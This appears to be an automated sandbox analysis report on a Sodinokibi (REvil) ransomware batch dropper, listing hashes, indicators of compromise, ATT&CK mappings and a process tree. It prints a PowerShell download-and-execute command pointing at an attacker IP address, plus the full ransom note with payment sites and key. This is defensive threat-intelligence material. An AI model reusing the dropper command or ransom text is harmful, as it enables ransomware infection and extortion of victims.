sodinokibi | 5949574200b2d571b720bac31031f7a5b01d4224da05e5cd5064156972eba462

General

Target

25670aeb8c557614c06e34c5a9c253e5.bat
Size

219B
MD5

c052ffa560e4de5251e2ea89d88526b5
SHA1

5f0a6636545f8107c02801a0a190a1a8c274b190
SHA256

5949574200b2d571b720bac31031f7a5b01d4224da05e5cd5064156972eba462
SHA512

f5f8fc051da52356820f62fd5088115bb5108d6cb37b2c13f0538816f84247f24d0188988407d8a9351ebd1ed5275a3c74daa49c6c6dcae02241b175a5a79f84

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/25670aeb8c557614c06e34c5a9c253e5

Extracted

Path

C:\429c34h-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 429c34h. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5EBEAD0EEC4F7ACC 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5EBEAD0EEC4F7ACC Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 59FakZ9H2xzuFbUyEf3poL2aAk9xitN5pjDXEQdwwxZnOoCciCtfJi47cocTJgDB /xZ0nB6U3MNQWM49AfcV0GoGM7SH0OE7Ak7Cq6bMCLRkGrRRizqqRPrB3GMcXYw6 Or2oK3zi3QrKfX1u81nBAjkcDK5mi4FaNRWK0pniFcD4Kt7ldLgsjfTC+L4DGT56 +IBD8CVItEsGSww9UJmL/87HD07RMVBefsWxlTehkRAxYATk587e+v64uXULOhIj d6feE17mWSvNEpmqT9xe3LZ+fyH+KzwOKZ/gK6Azlk5quCOcKRr+kysRA0gv3SiW x94JTZvoXv2Y3uab8RbUsZWKuQSOOxO7UP++KrjLLopADHsGbivBGeO6AGHdd7YA RnMbVay0lmMrKH63PosII7cj6L9Eqtx5zVT5Lpc6OTP14Aivaek8YofAIw0LoIIr fyvYEe27w9dTIsmAxXAYsOhUOQFFjtgEEjjpWPc/vALsUEAe2WniO4VNNZ/6dVBF Qbu/QEGuRB96xXcwF+DHkcQOYNE7OYhYephTPPvSg10wLqs2ZWkdjrZauRLUSYtV H0HdaDn7ixYrv37Mp7u8cByn26NC7iwioQSLSHiqrTB9IzqMNBV0V099Wlz/Su66 94Vfi8NpVtDi6H/PwTn4xsiVKPEBig+CTDnkGBrrbLOSB3GYXFbYGzfYJcMS7XCA VwwAhG8NWbFnnakjSGgYqjIJ1Q38EId2P5a2s3Z4krzjbBz/3b73Z/BV/hdSBPad 2QjGQhtzLtLgMOyCRM6AIAvcJ3nmexlRijTNRe8Z7BA3lGsNuhdv/Z/P+FWkmKBh gRBb5H0rsj3sFJ2GQbrR16CqBF6o/nP+mrs8qlsMgtszcfwtxwnDEDYvU5L7vR2X lFB7ZTB7WIppdkRHV4dRdx+ssYUaDBn6iWHVtzTqKzxtQaCIyfhxPzkd8xz0sHXW QpRAhl/gl5Hl/tBq04/MbXwTSZSTjBvxG4kOGhVQhPUbapo5DQe004Ycx9EiwH5n LQbtnBhlMllD2y1QjNISaVHZKNc4Ad9Q3m+1xNeUSysfk1XHDO+L9a4dcIUMsvVt X5bkTuuNTJSGsGRIbV0FjYaxhVQ01lIxe+Q8qBmHDqPE2h9WT9QVyEQRDd+n56xz e791rB5xgcKz8Sw/Eh93I3TZcaquh7XuTFFO/s2L9QmK6r2stRdsW/ld2mUeXAfe nqoIJK5JHusyXSpLd0j3iu7OESrCsnWiK95clG2gwu1DT7qp+L5zKgkp7oxmFLUW k25vZ7hIHjDusVoTDs9tgQfu ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5EBEAD0EEC4F7ACC

http://decryptor.cc/5EBEAD0EEC4F7ACC

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 3160 powershell.exe

flow	pid	process
3	3160	powershell.exe

Modifies extensions of user files 7 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\ClearExit.raw => \??\c:\users\admin\pictures\ClearExit.raw.429c34h	powershell.exe
File renamed	C:\Users\Admin\Pictures\ConvertMove.png => \??\c:\users\admin\pictures\ConvertMove.png.429c34h	powershell.exe
File renamed	C:\Users\Admin\Pictures\DisconnectFormat.png => \??\c:\users\admin\pictures\DisconnectFormat.png.429c34h	powershell.exe
File renamed	C:\Users\Admin\Pictures\ReceiveEnter.png => \??\c:\users\admin\pictures\ReceiveEnter.png.429c34h	powershell.exe
File renamed	C:\Users\Admin\Pictures\StepEnter.raw => \??\c:\users\admin\pictures\StepEnter.raw.429c34h	powershell.exe
File renamed	C:\Users\Admin\Pictures\SaveSend.raw => \??\c:\users\admin\pictures\SaveSend.raw.429c34h	powershell.exe
File renamed	C:\Users\Admin\Pictures\WaitRevoke.png => \??\c:\users\admin\pictures\WaitRevoke.png.429c34h	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\73z6480.bmp"	powershell.exe

Drops file in Program Files directory 12 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\ConvertSend.M2V	powershell.exe
File opened for modification	\??\c:\program files\ExitDebug.xps	powershell.exe
File opened for modification	\??\c:\program files\FindUnblock.tif	powershell.exe
File opened for modification	\??\c:\program files\OutTest.MTS	powershell.exe
File opened for modification	\??\c:\program files\UninstallSplit.raw	powershell.exe
File opened for modification	\??\c:\program files\UnregisterGrant.rm	powershell.exe
File opened for modification	\??\c:\program files\UpdateRepair.inf	powershell.exe
File created	\??\c:\program files\429c34h-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\429c34h-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\LimitOptimize.wps	powershell.exe
File opened for modification	\??\c:\program files\ResizeReceive.wav	powershell.exe
File opened for modification	\??\c:\program files\StartAdd.vdw	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe

pid process

3160 powershell.exe
3160 powershell.exe
3160 powershell.exe
3160 powershell.exe
3160 powershell.exe

pid	process
3160	powershell.exe
3160	powershell.exe
3160	powershell.exe
3160	powershell.exe
3160	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3160	powershell.exe
Token: SeDebugPrivilege	3160	powershell.exe
Token: SeTakeOwnershipPrivilege	3160	powershell.exe
Token: SeBackupPrivilege	3468	vssvc.exe
Token: SeRestorePrivilege	3468	vssvc.exe
Token: SeAuditPrivilege	3468	vssvc.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3672 wrote to memory of 3160	3672	cmd.exe	powershell.exe
PID 3672 wrote to memory of 3160	3672	cmd.exe	powershell.exe
PID 3672 wrote to memory of 3160	3672	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\25670aeb8c557614c06e34c5a9c253e5.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/25670aeb8c557614c06e34c5a9c253e5');Invoke-AMKGYOMYBGBS;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3160

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3468

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3160-0-0x0000000000000000-mapping.dmp

Download
memory/3160-1-0x00000000736F0000-0x0000000073DDE000-memory.dmp

Filesize
6.9MB

Download
memory/3160-2-0x0000000004CE0000-0x0000000004CE1000-memory.dmp

Filesize
4KB

Download
memory/3160-3-0x00000000078B0000-0x00000000078B1000-memory.dmp

Filesize
4KB

Download
memory/3160-4-0x0000000007660000-0x0000000007661000-memory.dmp

Filesize
4KB

Download
memory/3160-5-0x0000000007800000-0x0000000007801000-memory.dmp

Filesize
4KB

Download
memory/3160-6-0x0000000007EE0000-0x0000000007EE1000-memory.dmp

Filesize
4KB

Download
memory/3160-7-0x0000000008210000-0x0000000008211000-memory.dmp

Filesize
4KB

Download
memory/3160-8-0x0000000007F70000-0x0000000007F71000-memory.dmp

Filesize
4KB

Download
memory/3160-9-0x00000000087C0000-0x00000000087C1000-memory.dmp

Filesize
4KB

Download
memory/3160-10-0x0000000008890000-0x0000000008891000-memory.dmp

Filesize
4KB

Download
memory/3160-11-0x0000000009F70000-0x0000000009F71000-memory.dmp

Filesize
4KB

Download
memory/3160-12-0x00000000094F0000-0x00000000094F1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads